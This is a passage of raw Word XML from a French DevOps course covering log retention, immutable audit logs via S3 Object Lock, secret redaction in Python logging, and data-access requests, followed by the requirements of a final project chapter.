        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un filtre à l'émission · python</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Filtrage à l'émission : jamais de secret dans la sortie</w:t>
        <w:br/>
        <w:t>import logging, re</w:t>
        <w:br/>
        <w:br/>
        <w:t>SECRETS = re.compile(r"(password|token|authorization|cookie)", re.I)</w:t>
        <w:br/>
        <w:br/>
        <w:t>class FiltreSensible(logging.Filter):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def filter(self, record):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        message = record.getMessage()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if SECRETS.search(message):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            record.msg = "[message filtré]"</w:t>
        <w:br/>
        <w:t xml:space="preserve">            record.args = ()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return True</w:t>
        <w:br/>
        <w:br/>
        <w:t>logging.getLogger().addFilter(FiltreSensible())</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POLITIQUE DE JOURNALISATION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Une catégorie de journal par besoin.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Une durée de rétention décidée et documentée.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Aucune donnée sensible à l'émission.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Intégrité assurée par ajout seul et copie externe.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Une procédure d'accès et de suppression testée.</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Journal d'application, journal d'audit et piste métier ont des publics distincts.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niveau d'audit détermine le volume enregistré.</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La rétention se décide par catégorie selon un besoin réel.</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journal expiré ne revient pas lors d'une enquête.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L'intégrité exige l'ajout seul et une copie externe.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journal ne doit jamais contenir de secrets.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journaux relèvent des demandes d'accès et de suppression.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Ne pas collecter est la première optimisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les traces sont conservées et protégées. Le chapitre suivant met l'ensemble en œuvre.</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92.1 — Définir une politique de rétention</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Les journaux applicatifs coûtent trop cher.</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Classez les journaux.</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Fixez les durées.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Automatisez la transition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 92.2 — Protéger un journal d'audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un attaquant ne doit pas pouvoir effacer ses traces.</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Activez le mode ajout seul.</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Séparez les droits.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la suppression impossible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 92.3 — Répondre à une demande d'accès</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   CONFORMITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un utilisateur demande toutes les traces le concernant.</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Pseudonymisez les identifiants.</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Recherchez par empreinte.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Exportez et consignez.</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92.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>| Catégorie | Chaud | Froid | Suppression |</w:t>
        <w:br/>
        <w:t>| Applicatif | 30 j | 90 j | 180 j |</w:t>
        <w:br/>
        <w:t>| Audit sécurité | 90 j | 12 mois | 18 mois |</w:t>
        <w:br/>
        <w:t>| Métriques fines | 15 j | 90 j (agrégées) | 13 mois |</w:t>
        <w:br/>
        <w:t>| Traces | 7 j | — | 7 j |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les journaux d'audit ont une durée plus longue : ils servent de preuve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'agrégation des métriques permet de garder la tendance à faible coût.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 92.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>aws s3api put-object-lock-configuration --bucket journaux-audit \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --object-lock-configuration '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "ObjectLockEnabled": "Enabled",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Rule": {"DefaultRetention": {"Mode": "COMPLIANCE", "Days": 365}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Test : la suppression doit échouer</w:t>
        <w:br/>
        <w:t>aws s3 rm s3://journaux-audit/audit/2026-10-19.json</w:t>
        <w:br/>
        <w:t># An error occurred (AccessDenied)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le mode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>COMPLIANCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interdit la suppression même par un administrateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le test de suppression fait partie de la vérification : sans lui, la configuration n'est pas prouvée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 92.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Calcul de l'empreinte de l'adresse : sha256("u@exemple.fr")[:12]</w:t>
        <w:br/>
        <w:t>2. Recherche dans les index applicatif et audit (≤ 30 jours)</w:t>
        <w:br/>
        <w:t>3. Export des événements : horodatage, action, résultat — sans données d'autres personnes</w:t>
        <w:br/>
        <w:t>4. Remise sécurisée sous 30 jours</w:t>
        <w:br/>
        <w:t>5. Consignation : date de demande, périmètre, réponse, durée de traitement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'empreinte permet de retrouver les lignes sans stocker l'adresse en clair.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'export ne doit contenir que les événements de la personne concernée.</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 doit garantir un journal d'audit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Sa rapidité</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Son intégrité et son attribution</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Sa taille</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Sa couleur</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 xml:space="preserve">Que détermine le niveau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RequestResponse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserv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Rien</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L'enregistrement du corps de requête et de réponse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La durée de rétention</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Le chiffrement</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Pourquoi ne pas journaliser les jetons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Trop longs</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 journal devient une base de secrets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Trop lents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Non supportés</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 xml:space="preserve">Que fait le mode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>COMPLIANCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> d'un verrou d'objet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Autorise la suppression</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Interdit la suppression pendant la durée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Chiffre les objets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Compresse</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Première optimisation d'un volume de journaux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Compresser</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Ne pas collecter l'inutile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Chiffrer</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Indexer</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Il sert de preuve : il ne doit pas être modifiable.</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Il produit le plus gros volume d'audit.</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Un journal lisible par l'attaquant lui donne les clés.</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Même un administrateur ne peut pas lever le verrou avant l'échéance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chaque champ inutile coûte et expose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId137"/>
          <w:footerReference w:type="default" r:id="rId138"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE VII</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Mise en pratique</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Un projet complet qui rassemble l'ensemble des compétences du cours, du commit à la production.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>46. Projet final : une plateforme du commit à la production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>93. Projet final : une plateforme du commit à la production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Assembler tout ce qui précède en un système livré, observable et exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 8 h 00 · Niveau : Projet · Prérequis : chapitre 92</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À L'ISSUE DE CE CHAPITRE, VOUS SAUREZ</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Concevoir une plateforme complète et justifier ses choix.</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Automatiser de la construction à la production.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Rendre le système observable et réversible.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Documenter l'exploitation.</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Évaluer son travail avec une grille explicite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>93.1 Le cahier des charges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vous devez livrer une petite application de gestion de commandes, avec une interface, une API et une base de données. Le système doit être reconstruit intégralement depuis un dépôt, sans intervention manuelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.370 — Six exigences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57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Exigence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="373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Critère d'acceptation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Chapitre de référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Reproductibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3734"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une machine neuve suffit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>74 à 76</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Livraison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="373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Pipeline vert puis déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>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78, 79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réversibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3734"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Retour à la version précédente en 5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>80, 81</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="373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Aucun secret en clair</w:t>
            </w:r>
          </w:p>
        </w:tc>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77, 82</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Observabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3734"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trois signaux disponibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="373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Runbook et objectifs écrits</w:t>
            </w:r>
          </w:p>
        </w:tc>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84</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
